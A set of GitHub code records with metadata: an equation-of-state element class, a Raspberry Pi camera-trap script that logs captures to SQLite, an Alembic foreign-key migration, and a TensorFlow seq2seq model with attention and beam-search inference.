"mascDriver/data-science", "sub_path": "python/plotar_func.py", "file_name": "plotar_func.py", "file_ext": "py", "file_size_in_byte": 818, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "seaborn.set_palette", "line_number": 6, "usage_type": "call"}, {"api_name": "seaborn.set_style", "line_number": 7, "usage_type": "call"}, {"api_name": 
"seaborn.lineplot", "line_number": 8, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.show", "line_number": 14, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 14, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.figure", "line_number": 18, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 18, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 19, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 19, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 21, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 22, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 22, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 23, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.subplot", "line_number": 24, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 24, "usage_type": "name"}, {"api_name": "seaborn.lineplot", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "43417459638", "text": "import numpy as np\nimport mendeleev\nimport sympy\n\nfrom Var import Var\n\nmendeleev.H.isotopes[1].vdw_radius = 50.0\nmendeleev.H.isotopes[2].vdw_radius = 40.0\nmendeleev.H.isotopes[2].atomic_mass = 3.016\n\n\nclass Element:\n planck = 6.62607004e-34\n amu = 1.66054e-27\n density_data = list(np.power(10, Var.domain))\n planck_data = [planck] * len(Var.domain)\n\n def __init__(self, element_name):\n self.name = element_name\n if element_name == 'D':\n self.element = mendeleev.H.isotopes[1]\n self.element.vdw_radius = 50.0\n elif element_name == 'T':\n self.element = mendeleev.H.isotopes[2]\n self.element.vdw_radius = 40.0\n self.element.mass = 3.016\n else:\n self.element = getattr(mendeleev, element_name)\n self.atomic_radius, self.mass = self.element.vdw_radius, self.element.mass * Element.amu\n\n self.atomic_radius_data = [self.atomic_radius] * len(Var.domain)\n self.mass_data = [self.mass] * len(Var.domain)\n self.z_data = [self.element.atomic_number] * len(Var.domain)\n\n self.bulk_data = list(map(Var(np.loadtxt(f'Elements/{self.name}/Bulk_Test_{self.name}.dat')), np.power(10, Var.domain)))\n self.bulk_prime_data = list(map(Var(np.loadtxt(f'Elements/{self.name}/BulkPrime_Test_{self.name}.dat')), np.power(10, Var.domain)))\n self.pressure_data = list(map(Var(np.loadtxt(f'Purg Data/{self.name}.purgv157_rho_Pcgs.dat.fix')), np.power(10, Var.domain)))\n assert len(self.pressure_data) > 10, 'No data read'\n try:\n self.tf_data = list(map(Var(np.loadtxt(f'TF Data/{self.name}_TFCC_rhoPccgs.dat')), np.power(10, Var.domain)))\n except OSError:\n pass\n\n def __getitem__(self, var):\n if var == sympy.symbols('B'):\n return self.bulk_data\n elif var == sympy.symbols('Bp'):\n return self.bulk_prime_data\n elif var == sympy.symbols('P'):\n return self.pressure_data\n elif var == sympy.symbols('rho'):\n return Element.density_data\n elif var == sympy.symbols('r'):\n return self.atomic_radius_data\n elif var == sympy.symbols('m'):\n return self.mass_data\n elif var == sympy.symbols('h'):\n return Element.planck_data\n elif var == sympy.symbols('z'):\n return self.z_data\n else:\n return None\n", "repo_name": "TrellixVulnTeam/LLNL-EOS-Research_0J4Y", "sub_path": "Curve Fitting/Element.py", "file_name": "Element.py", "file_ext": "py", "file_size_in_byte": 2425, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": 
"mendeleev.H", "line_number": 7, "usage_type": "attribute"}, {"api_name": "mendeleev.H", "line_number": 8, "usage_type": "attribute"}, {"api_name": "mendeleev.H", "line_number": 9, "usage_type": "attribute"}, {"api_name": "numpy.power", "line_number": 15, "usage_type": "call"}, {"api_name": "Var.Var.domain", "line_number": 15, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 15, "usage_type": "name"}, {"api_name": "Var.Var.domain", "line_number": 16, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 16, "usage_type": "name"}, {"api_name": "mendeleev.H", "line_number": 21, "usage_type": "attribute"}, {"api_name": "mendeleev.H", "line_number": 24, "usage_type": "attribute"}, {"api_name": "Var.Var.domain", "line_number": 31, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 31, "usage_type": "name"}, {"api_name": "Var.Var.domain", "line_number": 32, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 32, "usage_type": "name"}, {"api_name": "Var.Var.domain", "line_number": 33, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 33, "usage_type": "name"}, {"api_name": "Var.Var", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 35, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 35, "usage_type": "call"}, {"api_name": "Var.Var.domain", "line_number": 35, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 36, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 36, "usage_type": "call"}, {"api_name": "Var.Var.domain", "line_number": 36, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 37, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 37, "usage_type": "call"}, {"api_name": "Var.Var.domain", "line_number": 37, "usage_type": "attribute"}, {"api_name": "Var.Var", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.loadtxt", "line_number": 40, "usage_type": "call"}, {"api_name": "numpy.power", "line_number": 40, "usage_type": "call"}, {"api_name": "Var.Var.domain", "line_number": 40, "usage_type": "attribute"}, {"api_name": "sympy.symbols", "line_number": 45, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 47, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 49, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 51, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 53, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 55, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 57, "usage_type": "call"}, {"api_name": "sympy.symbols", "line_number": 59, "usage_type": "call"}]} +{"seq_id": "41839927967", "text": "import datetime\nimport os.path\nimport sqlite3\nfrom os import mkdir\nfrom picamera import PiCamera\nfrom time import sleep\n\n# Check Storage Location\nstorageLocation = '/home/pi/CameraCaptures/'\nif os.path.exists(storageLocation) != True:\n mkdir(storageLocation)\n\n# Check Database\ndatabaseName = 'CapturedImages.db'\n\ntry: \n database = sqlite3.connect(storageLocation + databaseName)\n cursor = database.cursor()\n cursor.execute('''CREATE TABLE IF NOT EXISTS\n images(id INTEGER PRIMARY KEY, CaptureTime DATETIME, filePath TEXT)''') \n\n database.commit()\n \n # Instantiate a camera instance\n nextPicture = storageLocation + 
'test.jpg'\n camera = PiCamera()\n camera.rotation = 180\n sleep(5)\n camera.capture(nextPicture)\n\n # Reference it in the database\n cursor.execute('''INSERT INTO images(CaptureTime, filePath)\n VALUES(?,?)''', (datetime.datetime.now(), nextPicture))\n database.commit()\n\n # Display how many captures we have\n count = cursor.execute('SELECT Count(id) FROM images').fetchone()[0]\n print('We have {0} images'.format(count))\n \nexcept Exception as e:\n database.rollback()\n raise e\nfinally:\n database.close()\n", "repo_name": "jawFrome/MyPiBasedCameraTrap", "sub_path": "cameraControl.py", "file_name": "cameraControl.py", "file_ext": "py", "file_size_in_byte": 1217, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "os.path.path.exists", "line_number": 10, "usage_type": "call"}, {"api_name": "os.path.path", "line_number": 10, "usage_type": "attribute"}, {"api_name": "os.path", "line_number": 10, "usage_type": "name"}, {"api_name": "os.mkdir", "line_number": 11, "usage_type": "call"}, {"api_name": "sqlite3.connect", "line_number": 17, "usage_type": "call"}, {"api_name": "picamera.PiCamera", "line_number": 26, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 28, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 33, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 33, "usage_type": "attribute"}]}
{"seq_id": "41839927967", "text": "\"\"\"empty message\n\nRevision ID: e62028b04d70\nRevises: 9852331b1daf\nCreate Date: 2021-07-29 21:49:33.240411\n\n\"\"\"\nfrom alembic import op\nimport sqlalchemy as sa\n\n\n# revision identifiers, used by Alembic.\nrevision = 'e62028b04d70'\ndown_revision = '9852331b1daf'\nbranch_labels = None\ndepends_on = None\n\n\ndef upgrade():\n # ### commands auto generated by Alembic - please adjust! ###\n op.create_foreign_key(None, 'bugs', 'users', ['user_id'], ['id'])\n op.create_foreign_key(None, 'bugs', 'groups', ['group_id'], ['id'])\n op.create_foreign_key(None, 'users', 'groups', ['group_id'], ['id'])\n # ### end Alembic commands ###\n\n\ndef downgrade():\n # ### commands auto generated by Alembic - please adjust! 
###\n op.drop_constraint(None, 'users', type_='foreignkey')\n op.drop_constraint(None, 'bugs', type_='foreignkey')\n op.drop_constraint(None, 'bugs', type_='foreignkey')\n # ### end Alembic commands ###\n", "repo_name": "goosey-goose/CAPSTONE-PROJECT", "sub_path": "migrations/versions/20210729_214933_.py", "file_name": "20210729_214933_.py", "file_ext": "py", "file_size_in_byte": 922, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "alembic.op.create_foreign_key", "line_number": 21, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 21, "usage_type": "name"}, {"api_name": "alembic.op.create_foreign_key", "line_number": 22, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 22, "usage_type": "name"}, {"api_name": "alembic.op.create_foreign_key", "line_number": 23, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 23, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 29, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 29, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 30, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 30, "usage_type": "name"}, {"api_name": "alembic.op.drop_constraint", "line_number": 31, "usage_type": "call"}, {"api_name": "alembic.op", "line_number": 31, "usage_type": "name"}]} +{"seq_id": "3150109950", "text": "#!/usr/bin/env python\nimport time\nimport tensorflow as tf\nimport numpy as np\nimport tensorflow_addons as tfa\nimport os\n\n\nclass SeqHParams:\n def __init__(self,\n train_file: str,\n target_file: str,\n train_vocab: str,\n target_vocab: str,\n sos: str,\n eos: str,\n **kwargs):\n self.name = kwargs.get(\"name\", \"seq2seq-model\")\n self.train_file = train_file\n self.train_vocab = train_vocab\n self.target_file = target_file\n self.target_vocab = target_vocab\n self.sos = sos\n self.eos = eos\n\n self.batch_size = kwargs.get(\"batch_size\", 64)\n self.embedding_size = kwargs.get(\"embedding_size\", 128)\n self.rnn_units = kwargs.get(\"rnn_units\", 128)\n\n self.encoder_cell = kwargs.get(\"encoder_cell_type\", \"lstm\")\n self.encoder_embedding_dropout = kwargs.get(\"encoder_embedding_dropout\", 0.0)\n self.encoder_rnn_dropout = kwargs.get(\"encoder_rnn_dropout\", 0.0)\n self.encoder_activation = kwargs.get(\"encoder_activation\", \"sigmoid\")\n\n self.decoder_cell = kwargs.get(\"decoder_cell_type\", \"lstm\")\n self.decoder_embedding_dropout = kwargs.get(\"decoder_embedding_dropout\", 0.0)\n self.decoder_rnn_dropout = kwargs.get(\"decoder_rnn_dropout\", 0.0)\n self.decoder_activation = kwargs.get(\"decoder_activation\", \"sigmoid\")\n\n self.attention_units = kwargs.get(\"attention_units\", 128)\n self.attention = kwargs.get(\"attention\", \"bahdanau\")\n self.attention_normalized = kwargs.get(\"attention_normalized\", False)\n\n self.optimizer = kwargs.get(\"optimizer\", 'adam')\n self.learning_rate = kwargs.get(\"learning_rate\", 0.001)\n\n self.log_destination = kwargs.get(\"log_destination\", None)\n\n def update(self, dict_, **kwargs):\n kwargs.update(dict_)\n for i, k in enumerate(kwargs):\n setattr(self, k, kwargs[k])\n\n\nclass SequenceModel:\n def __init__(self, hparams):\n self.hparams = hparams\n with tf.io.gfile.GFile(self.hparams.train_file) as io:\n self.train_dataset = io.readlines()\n\n with tf.io.gfile.GFile(self.hparams.target_file) as io:\n self.target_dataset = io.readlines()\n\n self.train_dataset = [\n \"{} {} 
{}\".format(self.hparams.sos, i.strip(), self.hparams.eos) for i in self.train_dataset]\n self.target_dataset = [\n \"{} {} {}\".format(self.hparams.sos, i.strip(), self.hparams.eos) for i in self.target_dataset]\n\n with tf.io.gfile.GFile(self.hparams.train_vocab) as io:\n self.train_vocab_lookup = io.read().strip().split()\n with tf.io.gfile.GFile(self.hparams.target_vocab) as io:\n self.target_vocab_lookup = io.read().strip().split()\n\n self.train_tokenized_seq, self.train_tokenizer = SequenceModel.tokenize(self.train_dataset,\n self.train_vocab_lookup)\n self.target_tokenized_seq, self.target_tokenizer = SequenceModel.tokenize(self.target_dataset,\n self.target_vocab_lookup)\n\n self.train_max_vocab_len = SequenceModel.max_len(self.train_tokenized_seq)\n self.target_max_vocab_len = SequenceModel.max_len(self.target_tokenized_seq)\n\n self.train_vocab_size = len(self.train_tokenizer.word_index) + 1 # add 1 for 0 sequence character\n self.target_vocab_size = len(self.target_tokenizer.word_index) + 1\n\n self.buffer_size = len(self.train_tokenized_seq)\n self.steps = self.buffer_size // self.hparams.batch_size\n\n self.dataset = (tf.data\n .Dataset\n .from_tensor_slices((self.train_tokenized_seq, self.target_tokenized_seq))\n .shuffle(len(self.train_dataset))\n .batch(self.hparams.batch_size, drop_remainder=True))\n\n self.encoder = Encoder(self.train_vocab_size,\n self.hparams.embedding_size,\n self.hparams.rnn_units,\n rnn_dropout=self.hparams.encoder_rnn_dropout,\n rnn_cell_type=self.hparams.encoder_cell,\n rnn_activation=self.hparams.encoder_activation)\n\n self.decoder = Decoder(self.target_vocab_size,\n self.hparams.embedding_size,\n self.hparams.attention_units,\n self.hparams.rnn_units,\n self.hparams.batch_size,\n attention_type=self.hparams.attention,\n rnn_dropout=self.hparams.decoder_rnn_dropout,\n rnn_cell_type=self.hparams.decoder_cell,\n rnn_activation=self.hparams.decoder_activation)\n\n if self.hparams.optimizer == 'adam':\n self.optimizer = tf.keras.optimizers.Adam(lr=self.hparams.learning_rate)\n elif self.hparams.optimizer == 'rmsprop':\n self.optimizer = tf.keras.optimizers.RMSprop(lr=self.hparams.learning_rate)\n elif self.hparams.optimizer == 'sgd':\n self.optimizer = tf.keras.optimizers.SGD(lr=self.hparams.learning_rate)\n else:\n raise ValueError(\"Optimizer type not understood\", self.hparams.optimizer)\n\n def print_attr(self):\n for i, k in enumerate(self.__dict__):\n print(k, self.__dict__[k])\n\n @staticmethod\n def tokenize(d, lookup):\n tokenizer = tf.keras.preprocessing.text.Tokenizer(filters='', lower=False)\n tokenizer.fit_on_texts(lookup)\n sequences = tokenizer.texts_to_sequences(d)\n\n sequences = tf.keras.preprocessing.sequence.pad_sequences(sequences, padding='post')\n return sequences, tokenizer\n\n @staticmethod\n def max_len(tensor):\n return max(len(t) for t in tensor)\n\n @staticmethod\n def loss_function(y_pred,\n y,\n sse=tf.keras.losses.SparseCategoricalCrossentropy(from_logits=True, reduction='none')):\n loss = sse(y_true=y, y_pred=y_pred)\n mask = tf.logical_not(tf.math.equal(y, 0)) # output 0 for y=0 else output 1\n mask = tf.cast(mask, dtype=loss.dtype)\n loss = mask * loss\n loss = tf.reduce_mean(loss)\n return loss\n\n def initialize_initial_state(self, bs):\n return [tf.zeros((bs, self.hparams.rnn_units)), tf.zeros((bs, self.hparams.rnn_units))]\n\n @tf.function\n def train_step(self, input_batch, output_batch, encoder_initial_cell_state):\n with tf.GradientTape() as tape:\n encoder_emb_inp = 
self.encoder.encoder_embedding(input_batch)\n a, a_tx, c_tx = self.encoder.encoder_rnnlayer(encoder_emb_inp,\n initial_state=encoder_initial_cell_state)\n\n decoder_input = output_batch[:, :-1] # ignore \n decoder_output = output_batch[:, 1:] # ignore \n\n decoder_emb_inp = self.decoder.decoder_embedding(decoder_input)\n\n self.decoder.attention_mechanism.setup_memory(a)\n decoder_initial_state = self.decoder.build_decoder_initial_state(self.hparams.batch_size,\n encoder_state=[a_tx, c_tx],\n dtype=tf.float32)\n\n outputs, _, _ = self.decoder.decoder(decoder_emb_inp,\n initial_state=decoder_initial_state,\n sequence_length=self.hparams.batch_size * [\n self.target_max_vocab_len - 1])\n\n logits = outputs.rnn_output\n pred = tf.cast(tf.math.argmax(logits, axis=2), tf.int64)\n actu = tf.cast(decoder_output, tf.int64)\n accuracy = tf.math.count_nonzero(actu == pred) / (actu.shape[0] * actu.shape[1])\n loss = SequenceModel.loss_function(logits, decoder_output)\n\n variables = self.encoder.trainable_variables + self.decoder.trainable_variables\n gradients = tape.gradient(loss, variables)\n\n grads_and_vars = zip(gradients, variables)\n self.optimizer.apply_gradients(grads_and_vars)\n return loss, accuracy\n\n def train(self, epochs, verbose=True):\n if verbose:\n def _print(*args, color=None, **kwargs):\n if color == 'red':\n print('\\033[31m', end='')\n elif color == 'green':\n print('\\033[32m', end='')\n print(*args, '\\033[0m', **kwargs)\n\n else:\n def _print(*args, **kwargs):\n return\n\n def red(text, formatting=\"\"):\n return (\"\\033[31m{\" + formatting + \"}\\033[0m\").format(text)\n\n def green(text, formatting=\"\"):\n return (\"\\033[32m{\" + formatting + \"}\\033[0m\").format(text)\n\n def yellow(text, formatting=\"\"):\n return (\"\\033[33m{\" + formatting + \"}\\033[0m\").format(text)\n\n best_acc = prev_acc = prev_loss = 0\n best_loss = np.inf\n _print(\"Training for {} epochs\".format(epochs))\n total_batches = self.steps\n for i in range(1, epochs + 1):\n start = time.time()\n encoder_state = self.initialize_initial_state(self.hparams.batch_size)\n total_loss = total_accuracy = 0.0\n batch = 0\n for (batch, (input_batch, output_batch)) in enumerate(self.dataset.take(self.steps)):\n batch += 1\n batch_loss, batch_accuracy = self.train_step(input_batch, output_batch, encoder_state)\n total_loss += batch_loss\n total_accuracy += batch_accuracy\n _print(\"\\rEpoch {} Batch {}/{}\"\n \" [loss: {:0.04f}, accuracy: {:0.04f}, time: {:0.02f}s]\".format(i,\n batch,\n total_batches,\n total_loss / batch,\n total_accuracy / batch,\n time.time() - start\n ), end='')\n total_accuracy /= total_batches\n total_loss /= total_batches\n _print(\"\\n========================================\")\n _print(\" | Previous | Last | Best |\")\n _print(\"----------|----------|--------|--------|\")\n if best_acc < total_accuracy:\n best_acc = total_accuracy\n _print(\" Accuracy | {:0.04f} | {} | {} |\".format(prev_acc,\n green(total_accuracy, \":0.04f\"),\n yellow(best_acc, \":0.04f\")))\n else:\n _print(\" Accuracy | {:0.04f} | {} | {} |\".format(prev_acc,\n red(total_accuracy, \":0.04f\"),\n yellow(best_acc, \":0.04f\")))\n _print(\"----------|----------|--------|--------|\")\n\n if best_loss > total_loss:\n best_loss = total_loss\n _print(\" Loss | {:0.04f} | {} | {} |\".format(prev_loss,\n green(total_loss, \":0.04f\"),\n yellow(best_loss, \":0.04f\")))\n else:\n _print(\" Loss | {:0.04f} | {} | {} |\".format(prev_loss,\n red(total_loss, \":0.04f\"),\n yellow(best_loss, \":0.04f\")))\n 
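# NOTE: the red/green/yellow helpers above emit ANSI SGR escape codes (\\033[31m red, \\033[32m green, \\033[33m yellow, \\033[0m reset), which most terminals honor. A minimal standalone sketch of the same idea (hypothetical helper, not used by the training loop):\n def _colorize(text, code):\n # Wrap text in an ANSI color code and reset formatting afterwards.\n return '\\033[{}m{}\\033[0m'.format(code, text)\n 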
_print(\"----------|----------|--------|--------|\")\n completion = (time.time() - start) * (epochs - i)\n _print(\"Expected duration of completion: {:0.02f} more seconds\".format(completion))\n prev_acc = total_accuracy\n prev_loss = total_loss\n self.logger(i, total_loss, total_accuracy)\n\n @tf.function\n def infer_one(self, untokenized_sequence: list, beam_width: int):\n input_batch = tf.convert_to_tensor(self.target_tokenizer.texts_to_sequences([untokenized_sequence]))\n encoder_initial_cell_state = self.initialize_initial_state(1)\n encoder_emb_inp = self.encoder.encoder_embedding(input_batch)\n a, a_tx, c_tx = self.encoder.encoder_rnnlayer(encoder_emb_inp,\n initial_state=encoder_initial_cell_state)\n\n decoder_input = tf.expand_dims([self.target_tokenizer.word_index[self.hparams.sos]] * 1, 1)\n self.decoder.decoder_embedding(decoder_input)\n\n # Build from attention\n encoder_memory = tfa.seq2seq.tile_batch(a, beam_width)\n self.decoder.attention_mechanism.setup_memory(encoder_memory)\n\n # Build decoder state from encoder last state\n decoder_initial_state = self.decoder.rnn_cell.get_initial_state(batch_size=1 * beam_width,\n dtype=tf.float32)\n encoder_state = tfa.seq2seq.tile_batch([a_tx, c_tx], multiplier=beam_width)\n decoder_initial_state = decoder_initial_state.clone(cell_state=encoder_state)\n\n decoder_instance = tfa.seq2seq.BeamSearchDecoder(self.decoder.rnn_cell,\n beam_width=beam_width,\n output_layer=self.decoder.dense_layer)\n\n maximum_iterations = tf.round(tf.reduce_max(self.target_max_vocab_len) * tf.constant(2))\n\n decoder_embedding_matrix = self.decoder.decoder_embedding.variables[0]\n start_tokens = tf.fill([1], self.target_tokenizer.word_index[self.hparams.sos])\n end_token = self.target_tokenizer.word_index[self.hparams.eos]\n\n (first_finished, first_inputs, first_state) = decoder_instance.initialize(decoder_embedding_matrix,\n start_tokens=start_tokens,\n end_token=end_token,\n initial_state=decoder_initial_state)\n inputs = first_inputs\n state = first_state\n predictions = np.empty((1, beam_width, 0), dtype=np.int32)\n beam_scores = np.empty((1, beam_width, 0), dtype=np.float32)\n for j in range(maximum_iterations):\n beam_search_outputs, next_state, next_inputs, finished = decoder_instance.step(j, inputs, state)\n inputs = next_inputs\n state = next_state\n outputs = np.expand_dims(beam_search_outputs.predicted_ids, axis=-1)\n scores = np.expand_dims(beam_search_outputs.scores, axis=-1)\n predictions = np.append(predictions, outputs, axis=-1)\n beam_scores = np.append(beam_scores, scores, axis=-1)\n\n return self.target_tokenizer.sequences_to_texts(predictions[0]), tf.math.reduce_max(beam_scores[0], 1).numpy()\n\n def logger(self, epoch, loss, accuracy):\n if self.hparams.log_destination:\n with open(self.hparams.log_destination, 'a') as io:\n io.write(\"{},{},{}\\n\".format(epoch, loss, accuracy))\n\n def save_model(self, destination):\n try:\n os.mkdir(destination)\n except FileExistsError as e:\n pass\n destination = os.path.join(destination, self.hparams.name)\n self.encoder.save_weights(destination + \".encoder\")\n self.decoder.save_weights(destination + \".decoder\")\n\n def load_model(self, source):\n source = os.path.join(source, self.hparams.name)\n self.encoder.load_weights(source + \".encoder\")\n self.decoder.load_weights(source + \".decoder\")\n\n\nclass Encoder(tf.keras.Model):\n def __init__(self,\n vocab_size,\n embedding_size,\n rnn_units,\n rnn_dropout=0.0,\n rnn_cell_type='lstm',\n rnn_activation='tanh'):\n super().__init__()\n 
\n        self.encoder_embedding = tf.keras.layers.Embedding(input_dim=vocab_size,\n                                                            output_dim=embedding_size)\n        if rnn_cell_type == 'lstm':\n            self.encoder_rnnlayer = tf.keras.layers.LSTM(rnn_units,\n                                                         return_sequences=True,\n                                                         return_state=True,\n                                                         dropout=rnn_dropout,\n                                                         activation=rnn_activation)\n        elif rnn_cell_type == 'gru':\n            self.encoder_rnnlayer = tf.keras.layers.GRU(rnn_units,\n                                                        return_sequences=True,\n                                                        return_state=True,\n                                                        dropout=rnn_dropout,\n                                                        activation=rnn_activation)\n        else:\n            raise ValueError('Cell type unsupported:', rnn_cell_type)\n\n\nclass Decoder(tf.keras.Model):\n    def __init__(self,\n                 vocab_size,\n                 embedding_size,\n                 dense_units,\n                 rnn_units,\n                 batch_size,\n                 attention_type='bahdanau',\n                 rnn_dropout=0.0,\n                 rnn_cell_type='lstm',\n                 rnn_activation='tanh'):\n        super().__init__()\n        self.decoder_embedding = tf.keras.layers.Embedding(input_dim=vocab_size,\n                                                           output_dim=embedding_size)\n\n        self.dense_layer = tf.keras.layers.Dense(vocab_size)\n\n        if rnn_cell_type == 'lstm':\n            self.decoder_rnncell = tf.keras.layers.LSTMCell(rnn_units,\n                                                            activation=rnn_activation,\n                                                            dropout=rnn_dropout)\n        elif rnn_cell_type == 'gru':\n            self.decoder_rnncell = tf.keras.layers.GRUCell(rnn_units,\n                                                           activation=rnn_activation,\n                                                           dropout=rnn_dropout)\n        else:\n            raise ValueError('Cell type unsupported:', rnn_cell_type)\n\n        self.dense_units = dense_units\n        # Sampler\n        self.sampler = tfa.seq2seq.sampler.TrainingSampler()\n\n        # Create attention mechanism with memory = None\n        self.attention_mechanism = self.build_attention_mechanism(attention_type,\n                                                                  None,\n                                                                  batch_size * [vocab_size])\n        self.rnn_cell = self.build_rnn_cell()\n        self.decoder = tfa.seq2seq.BasicDecoder(self.rnn_cell,\n                                                sampler=self.sampler,\n                                                output_layer=self.dense_layer)\n\n    def build_attention_mechanism(self, attention_type, memory, memory_sequence_length):\n        if attention_type == 'luong':\n            return tfa.seq2seq.LuongAttention(self.dense_units,\n                                              memory=memory,\n                                              memory_sequence_length=memory_sequence_length)\n        elif attention_type == 'bahdanau':\n            return tfa.seq2seq.BahdanauAttention(self.dense_units,\n                                                 memory=memory,\n                                                 memory_sequence_length=memory_sequence_length)\n        else:\n            raise ValueError('Attention type unsupported:', attention_type)\n\n    # wrap the decoder RNN cell with the attention mechanism\n    def build_rnn_cell(self):\n        rnn_cell = tfa.seq2seq.AttentionWrapper(self.decoder_rnncell,\n                                                self.attention_mechanism,\n                                                attention_layer_size=self.dense_units)\n        return rnn_cell\n\n    def build_decoder_initial_state(self, batch_size, encoder_state, dtype):\n        decoder_initial_state = self.rnn_cell.get_initial_state(batch_size=batch_size,\n                                                                dtype=dtype)\n        decoder_initial_state = decoder_initial_state.clone(cell_state=encoder_state)\n        return decoder_initial_state\n", "repo_name": "ye-yu/cac-svs", "sub_path": "seq2seq_qi/__init__.py", "file_name": "__init__.py", "file_ext": "py", "file_size_in_byte": 21154, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "61", "api": [{"api_name": "tensorflow.io.gfile.GFile", "line_number": 58, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 58, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.GFile", "line_number": 61, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 61, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.GFile", "line_number": 69, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 69, "usage_type": "attribute"}, {"api_name": "tensorflow.io.gfile.GFile", "line_number": 71, "usage_type": "call"}, {"api_name": "tensorflow.io", "line_number": 71, "usage_type": "attribute"}, {"api_name": 
"tensorflow.data.Dataset.from_tensor_slices", "line_number": 88, "usage_type": "call"}, {"api_name": "tensorflow.data", "line_number": 88, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.Adam", "line_number": 112, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 112, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.RMSprop", "line_number": 114, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 114, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.optimizers.SGD", "line_number": 116, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 116, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.preprocessing.text.Tokenizer", "line_number": 126, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 126, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.preprocessing.sequence.pad_sequences", "line_number": 130, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 130, "usage_type": "attribute"}, {"api_name": "tensorflow.keras.losses.SparseCategoricalCrossentropy", "line_number": 140, "usage_type": "call"}, {"api_name": "tensorflow.keras", "line_number": 140, "usage_type": "attribute"}, {"api_name": "tensorflow.logical_not", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.math.equal", "line_number": 142, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 142, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 143, "usage_type": "call"}, {"api_name": "tensorflow.reduce_mean", "line_number": 145, "usage_type": "call"}, {"api_name": "tensorflow.zeros", "line_number": 149, "usage_type": "call"}, {"api_name": "tensorflow.GradientTape", "line_number": 153, "usage_type": "call"}, {"api_name": "tensorflow.float32", "line_number": 166, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.math.argmax", "line_number": 174, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.int64", "line_number": 174, "usage_type": "attribute"}, {"api_name": "tensorflow.cast", "line_number": 175, "usage_type": "call"}, {"api_name": "tensorflow.int64", "line_number": 175, "usage_type": "attribute"}, {"api_name": "tensorflow.math.count_nonzero", "line_number": 176, "usage_type": "call"}, {"api_name": "tensorflow.math", "line_number": 176, "usage_type": "attribute"}, {"api_name": "tensorflow.function", "line_number": 151, "usage_type": "attribute"}, {"api_name": "numpy.inf", "line_number": 209, "usage_type": "attribute"}, {"api_name": "time.time", "line_number": 213, "usage_type": "call"}, {"api_name": "time.time", "line_number": 228, "usage_type": "call"}, {"api_name": "time.time", "line_number": 256, "usage_type": "call"}, 